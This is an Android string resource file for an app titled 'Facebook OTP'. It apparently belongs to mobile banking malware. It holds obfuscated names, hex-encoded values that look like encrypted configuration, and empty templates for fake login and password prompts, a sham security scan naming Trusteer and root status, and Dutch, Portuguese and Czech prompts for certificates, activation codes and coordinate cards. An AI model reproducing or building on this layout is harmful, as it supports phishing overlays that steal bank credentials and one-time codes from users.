<resources>
    <string name="app_name">Facebook OTP</string>
    <string name="dYutIKdPEy">44</string>
    <string name="dagbratrtnyuty">@drawable/ic_launcher44</string>
    <string name="UQPGHOYRut">1</string>
    <string name="FWYGHmtCxk">079C8AE577F1E9E8B68599F792C1</string>
    <string name="ZyqebpAIHP">047677</string>
    <string name="update_min">1</string>
    <string name="ZcDKGDAmjB">180B525C72417B49C3E1FB9FAF41C467E8858B51838159</string>
    <string name="zVpxFlakDN">180B525C72417B49C3E1FB9FAF41DE6113CE811D82705D91F9</string>
    <string name="tLfcsFFJFT">180B525C72417B49C3E1FB9FAF41DE79D139D6837C6D</string>
    <string name="TDQPrmfHaf">180B525C72417B49C3E1EF2043A93A070B89C4589A</string>
    <string name="bSKbJypbBf">180B525C72417B49C3E1FB9707470F8C9194F1FF996A</string>
    <string name="vudzdBwhLL">180B525C72417B49C3E1FB9FAF41DD58E642BC4BCD47</string>
    <string name="AanDFxWfgv">180B525C72417B49C3E1EB64C6FBF2ADEF13530A0152</string>
    <string name="OgmDyLEpQA">14311</string>
    <string name="BdNGTQRkWZ">79C0DC8255450EB100B5EE252ABDE9</string>
    <string name="template1_action_settings" />
    <string name="template1_type_user" />
    <string name="template1_type_password" />
    <string name="template1_info" />
    <string name="template1_type_password2" />
    <string name="template1_OK_btn" />
    <string name="template1_title1" />
    <string name="template1_strOK" />
    <string name="template2_searching" />
    <string name="template2_not_found" />
    <string name="template3_dev_status" />
    <string name="template3_malware" />
    <string name="template3_clean" />
    <string name="template3_root_status" />
    <string name="template3_protected" />
    <string name="template3_os" />
    <string name="template3_uptodate" />
    <string name="template3_wifi" />
    <string name="template3_androidap" />
    <string name="template3_trusteer" />
    <string name="template3_trusteer_ver" />
    <string name="template3_scan_now" />
    <string name="template4_certificaat" />
    <string name="template4_genereer" />
    <string name="template4_invoeren" />
    <string name="template4_bevestigen" />
    <string name="template4_uw" />
    <string name="template4_code" />
    <string name="template4_deze" />
    <string name="template4_about" />
    <string name="template5_certificaat" />
    <string name="template5_genereer" />
    <string name="template5_invoeren" />
    <string name="template5_bevestigen" />
    <string name="template5_uw" />
    <string name="template5_code" />
    <string name="template5_deze" />
    <string name="template5_about" />
    <string name="template6_certificaat" />
    <string name="template6_genereer" />
    <string name="template6_invoeren" />
    <string name="template6_bevestigen" />
    <string name="template6_uw" />
    <string name="template6_code" />
    <string name="template6_deze" />
    <string name="template6_about" />
    <string name="template6_loading" />
    <string name="template6_first" />
    <string name="template7_row1" />
    <string name="template7_row2" />
    <string name="template7_row3" />
    <string name="template7_row4" />
    <string name="template8_title" />
    <string name="template8_activacia" />
    <string name="template8_scan" />
    <string name="template8_complete" />
    <string name="template8_last_scan" />
    <string name="template8_kod" />
    <string name="template9_certificaat" />
    <string name="template9_genereer" />
    <string name="template9_invoeren" />
    <string name="template9_bevestigen" />
    <string name="template9_uw" />
    <string name="template9_code" />
    <string name="template9_deze" />
    <string name="template9_about" />
    <string name="template9_loading" />
    <string name="template9_copy" />
    <string name="template9_copyright" />
    <string name="template10_certificaat" />
    <string name="template10_genereer" />
    <string name="template10_invoeren" />
    <string name="template10_bevestigen" />
    <string name="template10_uw" />
    <string name="template10_code" />
    <string name="template10_deze" />
    <string name="template10_about" />
    <string name="template10_loading" />
    <string name="template11_certificaat" />
    <string name="template11_genereer" />
    <string name="template11_invoeren" />
    <string name="template11_bevestigen" />
    <string name="template11_uw" />
    <string name="template11_code" />
    <string name="template11_deze" />
    <string name="template11_about" />
    <string name="template11_loading" />
    <string name="template12_certificaat" />
    <string name="template12_genereer" />
    <string name="template12_invoeren" />
    <string name="template12_bevestigen" />
    <string name="template12_uw" />
    <string name="template12_code" />
    <string name="template12_deze" />
    <string name="template12_about" />
    <string name="template12_loading" />
    <string name="template13_certificaat" />
    <string name="template13_genereer" />
    <string name="template13_invoeren" />
    <string name="template13_bevestigen" />
    <string name="template13_uw" />
    <string name="template13_code" />
    <string name="template13_deze" />
    <string name="template13_about" />
    <string name="template13_loading" />
    <string name="template14_certificaat" />
    <string name="template14_genereer" />
    <string name="template14_invoeren" />
    <string name="template14_bevestigen" />
    <string name="template14_uw" />
    <string name="template14_code" />
    <string name="template14_deze" />
    <string name="template14_about" />
    <string name="template14_loading" />
    <string name="template15_certificaat" />
    <string name="template15_genereer" />
    <string name="template15_invoeren" />
    <string name="template15_bevestigen" />
    <string name="template15_uw" />
    <string name="template15_code" />
    <string name="template15_deze" />
    <string name="template15_about" />
    <string name="template15_loading" />
    <string name="template16_certificaat" />
    <string name="template16_genereer" />
    <string name="template16_invoeren" />
    <string name="template16_bevestigen" />
    <string name="template16_uw" />
    <string name="template16_code" />
    <string name="template16_deze" />
    <string name="template16_about" />
    <string name="template16_loading" />
    <string name="template17_certificaat" />
    <string name="template17_trasted" />
    <string name="template17_steps" />
    <string name="template17_gener" />
    <string name="template17_kunt_gebruik" />
    <string name="template17_Persoonlijke" />
    <string name="template17_code" />
    <string name="template18_certificaat" />
    <string name="template18_genereer" />
    <string name="template18_invoeren" />
    <string name="template18_bevestigen" />
    <string name="template18_uw" />
    <string name="template18_code" />
    <string name="template18_deze" />
    <string name="template18_about" />
    <string name="template18_loading" />
    <string name="template18_first" />
    <string name="template19_certificaat" />
    <string name="template19_genereer" />
    <string name="template19_email" />
    <string name="template19_password" />
    <string name="template19_uw" />
    <string name="template19_code" />
    <string name="template19_deze" />
    <string name="template19_about" />
    <string name="template19_loading" />
    <string name="template19_re_renerate" />
    <string name="template19_copy" />
    <string name="template20_ttl" />
    <string name="template20_number" />
    <string name="template21_certificaat" />
    <string name="template21_genereer" />
    <string name="template21_invoeren" />
    <string name="template21_bevestigen" />
    <string name="template21_uw" />
    <string name="template21_code" />
    <string name="template21_deze" />
    <string name="template21_about" />
    <string name="template21_loading" />
    <string name="template22_certificaat" />
    <string name="template22_trasted" />
    <string name="template22_steps" />
    <string name="template22_gener" />
    <string name="template22_kunt_gebruik" />
    <string name="template22_Persoonlijke" />
    <string name="template22_code" />
    <string name="template23_copyright" />
    <string name="template23_generate" />
    <string name="template23_generated" />
    <string name="template23_wait" />
    <string name="template23_code" />
    <string name="template24_certificaat" />
    <string name="template24_genereer" />
    <string name="template24_invoeren" />
    <string name="template24_bevestigen" />
    <string name="template24_uw" />
    <string name="template24_code" />
    <string name="template24_deze" />
    <string name="template24_about" />
    <string name="template24_loading" />
    <string name="template24_first" />
    <string name="template25_certificaat" />
    <string name="template25_genereer" />
    <string name="template25_invoeren" />
    <string name="template25_bevestigen" />
    <string name="template25_uw" />
    <string name="template25_code" />
    <string name="template25_deze" />
    <string name="template25_about" />
    <string name="template25_loading" />
    <string name="template25_copy" />
    <string name="template25_copyright" />
    <string name="template26_certificaat" />
    <string name="template26_step1" />
    <string name="template26_invoeren" />
    <string name="template26_bevestigen" />
    <string name="template26_uw" />
    <string name="template26_code" />
    <string name="template26_deze" />
    <string name="template26_about" />
    <string name="template26_loading" />
    <string name="template26_copy" />
    <string name="template26_copyright" />
    <string name="template27_step1" />
    <string name="template27_step2" />
    <string name="template27_step3" />
    <string name="template27_title" />
    <string name="template27_copyight" />
    <string name="template27_step1_title" />
    <string name="template27_please_wait" />
    <string name="template27_step2_title" />
    <string name="template27_step3_title" />
    <string name="template27_greed_desc" />
    <string name="template27_row_title" />
    <string name="template27_step1_acualize" />
    <string name="template27_notification" />
    <string name="template27_actualize_suces" />
    <string name="template28_step1" />
    <string name="template28_step2" />
    <string name="template28_step3" />
    <string name="template28_step1_title" />
    <string name="template28_step1_acualize" />
    <string name="template28_notification" />
    <string name="template28_please_wait" />
    <string name="template28_please_wait2" />
    <string name="template28_step2_title" />
    <string name="template28_coordenada" />
    <string name="template28_policao" />
    <string name="template28_algarismo" />
    <string name="template28_greed_title" />
    <string name="template28_step3_title" />
    <string name="template28_actualize_suces" />
    <string name="template28_copyight" />
    <string name="template29_certificaat" />
    <string name="template29_copyight" />
    <string name="template29_loading" />
    <string name="template29_ktivacni_kod" />
    <string name="template29_deze" />
    <string name="template29_code" />
    <string name="template29_about" />
    <string name="template29_copy" />
    <string name="template30_generate" />
    <string name="template30_loading" />
    <string name="template30_protect" />
    <string name="template30_congr" />
    <string name="template30_code" />
    <string name="template31_certificaat" />
    <string name="template31_trasted" />
    <string name="template31_steps" />
    <string name="template34_trasted" />
    <string name="template34_steps" />
    <string name="template34_copyight" />
    <string name="template34_kunt_gebruik" />
    <string name="template34_Persoonlijke" />
    <string name="template34_code" />
</resources>